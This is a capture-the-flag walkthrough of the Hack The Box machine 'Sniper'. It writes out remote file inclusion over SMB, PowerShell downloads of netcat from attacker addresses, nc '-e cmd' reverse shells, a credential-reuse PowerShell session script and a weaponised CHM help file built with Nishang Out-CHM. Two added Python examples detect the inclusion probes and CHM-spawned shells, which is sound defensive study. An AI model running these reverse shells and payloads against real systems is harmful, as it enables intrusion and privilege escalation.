As always, first an nmap scan.
root@kali:~/htb/sniper# nmap -A 10.10.10.151 -oN fullscan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-27 05:00 EST
Nmap scan report for sniper.htb (10.10.10.151)
Host is up (0.091s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-27T18:02:27
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   92.15 ms 10.10.14.1
2   94.52 ms sniper.htb (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.82 seconds
root@kali:~/htb/sniper#
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server I find nothing of immediate importance, so I keep browsing the web pages. At some point in the blog I see a page that accepts a parameter, so I start playing with it. Because it may be vulnerable to file inclusion, I start with local and remote file inclusion attempts. After some ups and downs I find that neither local nor remote file inclusion works over HTTP, so I keep looking to see if anything else is possible. While researching in Burp I find this link on RFI over SMB.
GET /blog/?lang=\WINDOWS\system32\drivers\etc\hosts HTTP/1.1
Host: 10.10.10.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
So I reconfigure my SMB server to have a share called "sniper" and see if I can replicate what is in the examples. See also: https://www.puckiestyle.nl/create-a-public-samba-share/
On Kali, first run: systemctl start smbd
After some trial and error I see my nickname popping up in the page source, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB server.
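The inclusion requests described above leave a clear trace in the web server's own logs. As an added example that is not part of the original writeup, the following Python script parses constructed IIS W3C log lines, flags lang values that are absolute paths, UNC paths (the RFI-over-SMB case), traversal sequences or URLs, and shows the allow-list lookup that removes the bug on the server side. The log excerpt, its field layout and the ALLOWED_LANGS table are constructed for this example.

```python
"""Spot file-inclusion probes against the blog's 'lang' parameter in IIS logs.

Added example for this writeup, not code from the original post. The log
lines, their field layout and the ALLOWED_LANGS table are constructed.
"""
import re
from urllib.parse import parse_qs, unquote

# Constructed IIS W3C extended log excerpt. IIS writes spaces inside values as '+',
# so splitting on single spaces is safe once the #Fields: header is known.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-01-27 10:00:01 10.10.10.151 GET /blog/ lang=en.php 80 - 10.10.14.2 Mozilla/5.0 200
2020-01-27 10:00:05 10.10.10.151 GET /blog/ lang=\\WINDOWS\\system32\\drivers\\etc\\hosts 80 - 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:00:09 10.10.10.151 GET /blog/ lang=%5c%5c10.10.14.11%5csniper%5cshell.php 80 - 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:00:12 10.10.10.151 GET /blog/ lang=http://10.10.14.11/shell.php 80 - 10.10.14.11 Mozilla/5.0 500
2020-01-27 10:00:15 10.10.10.151 GET /blog/ lang=..%2f..%2f..%2fwindows%2fwin.ini 80 - 10.10.14.11 Mozilla/5.0 200
2020-01-27 10:00:20 10.10.10.151 GET /index.php - 80 - 10.10.14.2 Mozilla/5.0 200
"""

# Ordered: the UNC test must run before the generic absolute-path test,
# because "\\host\share" also starts with a backslash.
SUSPICIOUS = [
    ("unc_path",   re.compile(r"^\\\\[^\\]+\\")),               # \\host\share\... (RFI over SMB)
    ("abs_path",   re.compile(r"^[\\/]|^[A-Za-z]:[\\/]")),      # \WINDOWS\... or C:\...
    ("traversal",  re.compile(r"(^|[\\/])\.\.([\\/]|$)")),      # ../ or ..\ segments
    ("remote_url", re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")),  # http://, ftp://, ...
]


def classify_lang(value):
    """Return a label for an unsafe 'lang' value, or None if it looks like a plain key."""
    # Values coming from parse_qs are already decoded once; decoding again
    # catches %255c-style double encoding.
    decoded = unquote(value)
    for label, pattern in SUSPICIOUS:
        if pattern.search(decoded):
            return label
    return None


def parse_iis_log(log_text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_inclusion_attempts(log_text, param="lang"):
    """Return (timestamp, client ip, label, decoded value) for each suspicious request."""
    hits = []
    for rec in parse_iis_log(log_text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_lang(value)
            if label:
                hits.append((f'{rec["date"]} {rec["time"]}', rec["c-ip"], label, unquote(value)))
    return hits


# The server-side fix: the request selects a key, never a path.
ALLOWED_LANGS = {"en": "en.php", "nl": "nl.php"}  # constructed table


def resolve_lang(value, default="en"):
    """Allow-list lookup; anything not in the table falls back to the default."""
    return ALLOWED_LANGS.get(value, ALLOWED_LANGS[default])


if __name__ == "__main__":
    for when, client, label, value in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{when} {client:<14} {label:<10} lang={value}")
```

Running it prints four flagged requests, all from the same client, while the plain lang=en.php request is left alone; resolve_lang shows why the hardened page is unaffected by any of them.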
The db.php file contains a username and password, which could be interesting, so I note them for later use and decide it is time to try a decent shell.
powershell Invoke-Webrequest "http://10.10.10.78/nc.exe" -OutFile c:\puckiestyle\nc.exe
So first I use PowerShell to transfer netcat, or, even simpler, by uploading the wwwolf PHP webshell.
nc.exe 10.10.14.11 9001 -e cmd
Then I call nc.exe and get a shell on Sniper.
root@kali:~/htb# rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49684
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\puckiestyle>whoami
whoami
nt authority\iusr

C:\puckiestyle>
So I got the shell as IUSR. There is only one other regular user on the box, named Chris. Maybe the database password is the same as the user password, so I want to try using PowerShell to escalate my rights. After some searching on how to use the password with a PowerShell command, I came across a script and decided to adjust it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession
Again, I use PowerShell to transfer the file and then execute it.
powershell Invoke-WebRequest "http://10.10.14.11/getshell.ps1" -OutFile c:\puckiestyle\getshell.ps1
c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
c:\>cmd /c icacls puckiestyle /c /t /grant everyone:F
cmd /c icacls puckiestyle /c /t /grant everyone:F
processed file: puckiestyle
processed file: puckiestyle\getshell.ps1
processed file: puckiestyle\Microsoft
processed file: puckiestyle\nc.exe
processed file: puckiestyle\Microsoft\Windows
processed file: puckiestyle\Microsoft\Windows\PowerShell
processed file: puckiestyle\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Successfully processed 7 files; Failed processing 0 files

c:\puckiestyle>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\puckiestyle>
[localhost]: PS C:\Users\Chris\Documents> C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
C:\puckiestyle\nc.exe 10.10.14.11 9002 -e powershell
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 9002
listening on [any] 9002 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.151] 49711
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29fc4dd867500c1ad716cf56e
PS C:\Users\Chris\Documents>
Now I have a fully functional shell.
It is also possible with WinRM. First upload and run plink.exe:
C:\temp>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8
.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.8
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
login as: puck
puck@10.10.14.8's password: secretpassword

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jan 27 03:34:27 2020 from 10.10.10.151
Could not chdir to home directory /home/puck: No such file or directory
$
And next
PrivEsc
I found this:
PS C:\Users\Chris> dir Downloads
dir Downloads
Directory: C:\Users\Chris\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm
A compiled HTML Help file, so this can be interesting. With netcat I transferred this file to my Windows box, and this was the content:
After more enumeration on disk I found:
PS C:\Docs> type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
So apparently a CHM file like instructions.chm is what Chris should prepare for the CEO and then drop in this folder. I first installed HTML Help Workshop (htmlhelp.exe) from https://www.microsoft.com/en-us/download/details.aspx?id=21138 and then used Nishang's Out-CHM.ps1: https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1
C:\temp>Powershell -Version 2
PS C:\temp> Import-Module .\Out-CHM.ps1
PS C:\temp> out-chm -Payload "c:\temp\nc 10.10.14.8 5353 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\temp\doc.chm

Compile time: 0 minutes, 0 seconds
2 Topics
4 Local links
4 Internet links
0 Graphics

Created c:\temp\doc.chm, 13,428 bytes
Compression increased file by 271 bytes.
PS C:\temp> copy .\doc.chm c:\python37\project.chm
root@kali:~/htb/sniper# python3 -m http.server 82
Serving HTTP on 0.0.0.0 port 82 (http://0.0.0.0:82/) ...
10.10.10.151 - - [27/Jan/2020 03:58:26] "GET /project.chm HTTP/1.1" 200 -
PS C:\Docs> Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
Invoke-WebRequest "http://10.10.14.8:82/project.chm" -Outfile c:\Docs\project.chm
From the Sniper host I run Invoke-WebRequest again to download the CHM file into the Docs folder, while a netcat listener waits for the shell.
root@kali:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363e2750e994f6be0b7436c15
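The CHM chain above (compile the help file with Out-CHM, drop it where it will be opened, the payload runs when the file is viewed) leaves a recognisable parent/child relationship in endpoint telemetry. As an added example that is not part of the original writeup, the following Python code detects it over constructed process-creation records and names the CHM that was open when the shell appeared. The field names follow Sysmon Event ID 1 (ProcessCreate); hh.exe being the Windows HTML Help viewer is standard behaviour; the SHELLS list, hostnames, PIDs and timestamps are assumptions constructed for the example.

```python
"""Detect a CHM help file spawning a shell from process-creation telemetry.

Added example for this writeup, not the original author's code. Windows opens
.chm files with hh.exe (the HTML Help viewer), so a payload embedded the way
Out-CHM does it shows up as hh.exe starting cmd.exe or another interpreter.
The events below are constructed in the shape of Sysmon Event ID 1 fields;
hostnames, PIDs and timestamps are made up.
"""
import ntpath
import shlex

CHM_VIEWER = "hh.exe"
# Interpreters a help file has no business launching (assumed list, extend as needed).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}

SAMPLE_EVENTS = [  # constructed
    {"UtcTime": "2020-01-27 09:01:10", "Computer": "SNIPER", "User": "SNIPER\\Administrator",
     "ProcessId": 4120, "ParentProcessId": 1300,
     "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Docs\project.chm'},
    {"UtcTime": "2020-01-27 09:01:11", "Computer": "SNIPER", "User": "SNIPER\\Administrator",
     "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r"cmd.exe /c c:\temp\nc 10.10.14.8 5353 -e cmd"},
    {"UtcTime": "2020-01-27 09:01:11", "Computer": "SNIPER", "User": "SNIPER\\Administrator",
     "ProcessId": 4210, "ParentProcessId": 4188,
     "Image": r"c:\temp\nc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"c:\temp\nc 10.10.14.8 5353 -e cmd"},
    {"UtcTime": "2020-01-27 09:05:00", "Computer": "SNIPER", "User": "SNIPER\\Chris",
     "ProcessId": 5000, "ParentProcessId": 1300,
     "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Program Files\Tool\manual.chm"'},  # benign open
    {"UtcTime": "2020-01-27 09:06:00", "Computer": "SNIPER", "User": "SNIPER\\Chris",
     "ProcessId": 5100, "ParentProcessId": 1300,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe"},  # benign shell started from the desktop
]


def image_name(path):
    """Lower-cased file name of an Image/ParentImage path."""
    return ntpath.basename(path or "").lower()


def chm_path_from_cmdline(cmdline):
    """Return the .chm argument handed to hh.exe, quotes stripped, or None."""
    # Non-POSIX mode: backslashes are not escape characters, quotes are kept on the token.
    for token in shlex.split(cmdline, posix=False):
        token = token.strip('"')
        if token.lower().endswith(".chm"):
            return token
    return None


def is_chm_shell_spawn(event):
    """True when hh.exe is the direct parent of a shell or script interpreter."""
    return (image_name(event.get("ParentImage")) == CHM_VIEWER
            and image_name(event.get("Image")) in SHELLS)


def find_chm_shell_spawns(events):
    """Return one alert per shell spawned by hh.exe, naming the CHM that was open."""
    hh_launches = {e["ProcessId"]: e for e in events if image_name(e.get("Image")) == CHM_VIEWER}
    alerts = []
    for event in events:
        if not is_chm_shell_spawn(event):
            continue
        launcher = hh_launches.get(event.get("ParentProcessId"))
        alerts.append({
            "time": event["UtcTime"],
            "host": event["Computer"],
            "user": event["User"],
            "child": event["CommandLine"],
            "chm": chm_path_from_cmdline(launcher["CommandLine"]) if launcher else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_chm_shell_spawns(SAMPLE_EVENTS):
        print(f'{alert["time"]} {alert["host"]} {alert["user"]}: {alert["chm"]} -> {alert["child"]}')
```

Only the cmd.exe whose parent is hh.exe is reported; the legitimate help file opened by Chris and the cmd.exe started from Explorer are not. Correlating on ParentProcessId rather than on the image name alone is what lets the alert carry the path of the offending CHM, which is the artefact a responder would pull from C:\Docs next.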
Author : Puckiestyle